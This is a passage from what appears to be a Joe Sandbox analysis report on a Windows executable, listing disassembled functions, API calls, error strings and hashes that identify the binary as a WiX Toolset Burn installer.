                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • _memcpy_s.LIBCMT ref: 008E58BD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate_memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to get current memory size.$Failed to get new memory size.$Failed to reallocate memory$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3866612605-1266056832
                                                                                                                                                                                                                                                                            • Opcode ID: 0206951f45b8437e727c9c5f8f57b4c4dca80dc6a1be604c0a3041f3cf807785
                                                                                                                                                                                                                                                                            • Instruction ID: 1d04016507c6d50c757605dcbe7036cc51b6c3895df0dde49f7d06c24eae4cd1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0206951f45b8437e727c9c5f8f57b4c4dca80dc6a1be604c0a3041f3cf807785
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02312B31540B99FBDB11AE6ACC45FAF3A69FB82719F100130F904EB151D671CD11A791
                                                                                                                                                                                                                                                                            Function 0093C3C7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 100registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,0093D811,008E6CF2,009031C1,009031C1,00000001,?,008F79A8,009031C1,DisplayName,00000000,008E6CF2,009031C1,00000000,008E6CF2), ref: 0093C42D
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?,0093D811,008E6CF2,009031C1,009031C1,00000001,?,008F79A8,009031C1,DisplayName,00000000,008E6CF2,009031C1,00000000,008E6CF2), ref: 0093C47F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$Delete
                                                                                                                                                                                                                                                                            • String ID: DisplayName$Failed to delete registry value: %ls$Failed to determine length of registry value: %ls$Failed to set registry value: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1738766685-322587201
                                                                                                                                                                                                                                                                            • Opcode ID: 96333ee618e1aba4847dd7ed2d5d75d15b9a4e4fc66caa1525a7a9f0663ef921
                                                                                                                                                                                                                                                                            • Instruction ID: 2029a7ce8fe5fa92b87ba1fcbc27ed36ef34fe929da79191618096655681567a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96333ee618e1aba4847dd7ed2d5d75d15b9a4e4fc66caa1525a7a9f0663ef921
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F2106BB214A25B7EB115B158C1DEBF2A6DEBC6760F158024FE18B72A0E630CC119B70
                                                                                                                                                                                                                                                                            Function 0093997A Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 83COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,008E6570,00000000,008E6570,00000000,00000000,ignored ,00000000,00000000,00000000,?,?,?,008E7B19,00000000,?), ref: 009399E1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E7B19,00000000,?,?,00000003,00000000,008E6570,00000000,?,?,?,?,?), ref: 009399EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ArgvCommandErrorLastLine
                                                                                                                                                                                                                                                                            • String ID: Failed to copy command line.$Failed to initialize command line.$Failed to parse command line.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\app2util.cpp$ignored
                                                                                                                                                                                                                                                                            • API String ID: 3459693003-1494111247
                                                                                                                                                                                                                                                                            • Opcode ID: 0556db46d5c0845fb979d8db6ead42ba6bdf7c7fbaa279756cb8da5cea79f8c9
                                                                                                                                                                                                                                                                            • Instruction ID: 281cd50592ece6a1a349e90061cb95211af342a33d3f543586b6f74c29ecc51e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0556db46d5c0845fb979d8db6ead42ba6bdf7c7fbaa279756cb8da5cea79f8c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1721C876A40224BBDB219B598C0AF9F7EACEF51B50F014155FE08FB281E6B09E00DA91
                                                                                                                                                                                                                                                                            Function 009431AD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindFirstFileW.KERNEL32(008E6DEA,?,008E6DEA,008E6DEA,00000000), ref: 00943476
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindClose.KERNEL32(00000000), ref: 00943482
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(0091E626,00000080,00000000,0091E626,000000FF,00000000,00000000,?,?,0091E626), ref: 009431E0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0091E626), ref: 009431EA
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0091E626,00000000,0091E626,000000FF,00000000,00000000,?,?,0091E626), ref: 00943223
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0091E626), ref: 0094322D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                                                                                                                            • String ID: Failed to delete file: %ls$Failed to remove attributes from file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3967264933-3778428042
                                                                                                                                                                                                                                                                            • Opcode ID: 507c0cbefae7a366628eef137a26200f3214b66bf48a4931ea1de9af8f188ba4
                                                                                                                                                                                                                                                                            • Instruction ID: 2d430bd436342e95f8962382e09b26fe77c3f765274e789f43b526474d2f1b66
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 507c0cbefae7a366628eef137a26200f3214b66bf48a4931ea1de9af8f188ba4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0011D073A4572532D231927A9C4AF6FB95CAF42BA5F01C200FD24F61C1E6A0CE0196E1
                                                                                                                                                                                                                                                                            Function 0090E2B8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0090E336
                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0090E348
                                                                                                                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 0090E35B
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0090DE6A,?,?), ref: 0090E36A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                                                                                                                            • String ID: Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 609741386-1783119398
                                                                                                                                                                                                                                                                            • Opcode ID: 70fd524e4c875c48deda7bbfc00fedbbd2ecb447c88a6b0a44c91e6c076fa931
                                                                                                                                                                                                                                                                            • Instruction ID: e4256684c3a241e21d789d8c7b82423ed66a397daca878b83ce566cef247f668
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70fd524e4c875c48deda7bbfc00fedbbd2ecb447c88a6b0a44c91e6c076fa931
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C821CFB280021ABFCB10DF698C48DAA7BACFB09720B404616F965E71D0D374EA50CB90
                                                                                                                                                                                                                                                                            Function 00941B2C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 67libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(PathAllocCanonicalize,api-ms-win-core-path-l1-1-0.dll), ref: 00941B7E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00941D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00941B8D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                            • String ID: Failed to get address of PathAllocCanonicalize.$Failed to load api-ms-win-core-path-l1-1-0.dll$PathAllocCanonicalize$api-ms-win-core-path-l1-1-0.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 199729137-1104870970
                                                                                                                                                                                                                                                                            • Opcode ID: 5d3db3607b8133b3cc2b2cd868d321689001877dd47d30d70cc092c1b88d15b8
                                                                                                                                                                                                                                                                            • Instruction ID: 62a7bd1e66653e2e6e4a0b7cfdf742c65c47fec95f2dba116b2427636aad8fc5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d3db3607b8133b3cc2b2cd868d321689001877dd47d30d70cc092c1b88d15b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41113673A92331A2D73512586C0EF271898DB81BA4F118329BD08FF2EAF3A54CC1A1D1
                                                                                                                                                                                                                                                                            Function 0093E087 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 0093E0B5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E6FBB,00000001,?,?,Function_000069E0,?), ref: 0093E0C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                            • String ID: Failed to find set restore point proc address.$Failed to initialize security for COM to talk to system restore.$SRSetRestorePointW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp$srclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 1866314245-3391705418
                                                                                                                                                                                                                                                                            • Opcode ID: 4410eb071e759299cbdb930247d6293cac6895247b789c99688047b72b6bf4b1
                                                                                                                                                                                                                                                                            • Instruction ID: 994b5a7fdc25c77ba0102fd4de684ce8c676f82c18246aa6ba024e307e958833
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4410eb071e759299cbdb930247d6293cac6895247b789c99688047b72b6bf4b1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C112937ED977563D63227959C0EF1B2A68EB52B64F0A4121FE08BA2C0E5F09C80DDD5
                                                                                                                                                                                                                                                                            Function 0093B700 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 55libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,008E6DEA,00000000,?,008F0CFC,008E6DEE,008E6DEA,?,008F066B,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000), ref: 0093B711
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0093B718
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008F0CFC,008E6DEE,008E6DEA,?,008F066B,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000,008E6DEA,008E6CF2,008E7162,008E6DEA), ref: 0093B741
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                            • String ID: Failed to disable file system redirection.$Wow64DisableWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$kernel32
                                                                                                                                                                                                                                                                            • API String ID: 4275029093-2679686115
                                                                                                                                                                                                                                                                            • Opcode ID: e520c565c86413cc2cdc957c3c2c5ed8d7e6a39a1280a81f009697aa249f650e
                                                                                                                                                                                                                                                                            • Instruction ID: d2e59733448b555bbe8049388846f7b53407eb87de342a89c66f7915e76a043a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e520c565c86413cc2cdc957c3c2c5ed8d7e6a39a1280a81f009697aa249f650e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D014C7B60133467D3205A599C4EE5F695CEBC1760F010111FF16EB280E774CC018AE1
                                                                                                                                                                                                                                                                            Function 0093C8C3 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 0093C8FF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(RegGetValueW), ref: 0093C915
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • AdvApi32.dll, xrefs: 0093C8C9
                                                                                                                                                                                                                                                                            • Failed to load AdvApi32.dll, xrefs: 0093C8D9
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093C8E5
                                                                                                                                                                                                                                                                            • RegDeleteKeyExW, xrefs: 0093C8F4
                                                                                                                                                                                                                                                                            • RegGetValueW, xrefs: 0093C905
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                            • String ID: AdvApi32.dll$Failed to load AdvApi32.dll$RegDeleteKeyExW$RegGetValueW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 856020675-1672349681
                                                                                                                                                                                                                                                                            • Opcode ID: 35174d3177a6a3cd32418eb1d1584d6c95e611eab83cc903043e7662790da2ad
                                                                                                                                                                                                                                                                            • Instruction ID: 38ebfd7803a5f25bdc992ce8ae00fc08b3867115c79571a4d6ecd91951d79574
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35174d3177a6a3cd32418eb1d1584d6c95e611eab83cc903043e7662790da2ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF03CF7AAE714EBE7109F25AC0AF013B74BB95B29F424215E50CA62A0D7B048C0EF50
                                                                                                                                                                                                                                                                            Function 008FC6E8 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 198COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Aborted cache verify payload signature begin.$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-338742995
                                                                                                                                                                                                                                                                            • Opcode ID: a65dbfe8e726f70aa415f82697b12cedce75038f136c29db1e26eb4d2618aee8
                                                                                                                                                                                                                                                                            • Instruction ID: 3efcc3a5bef47a5629b1a1761478c857b04b353941ee7718f7b9f36ce514de53
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a65dbfe8e726f70aa415f82697b12cedce75038f136c29db1e26eb4d2618aee8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94518272D0122DABDB11DEA9CD45FEF7AB8FF49754F110125BA00FB281D77099009BA1
                                                                                                                                                                                                                                                                            Function 008F7CE9 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 126stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 008E6313
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: GetLastError.KERNEL32(?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 008E6321
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 008F7D78
                                                                                                                                                                                                                                                                              • Part of subcall function 00943EAD: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,?,00000000,?,00000000,?,008F7D8F,?,00000080,?,00000000), ref: 00943EC5
                                                                                                                                                                                                                                                                              • Part of subcall function 00943EAD: GetLastError.KERNEL32(?,00000000,?,008F7D8F,?,00000080,?,00000000,?,?,?,swidtag,?,?,?,?), ref: 00943ED2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F7DDF, 008F7E28
                                                                                                                                                                                                                                                                            • Failed to allocate regid folder path., xrefs: 008F7E02
                                                                                                                                                                                                                                                                            • Failed to write tag xml to file: %ls, xrefs: 008F7DB6
                                                                                                                                                                                                                                                                            • Failed to allocate regid file path., xrefs: 008F7DEE
                                                                                                                                                                                                                                                                            • Failed to create regid folder: %ls, xrefs: 008F7DCD
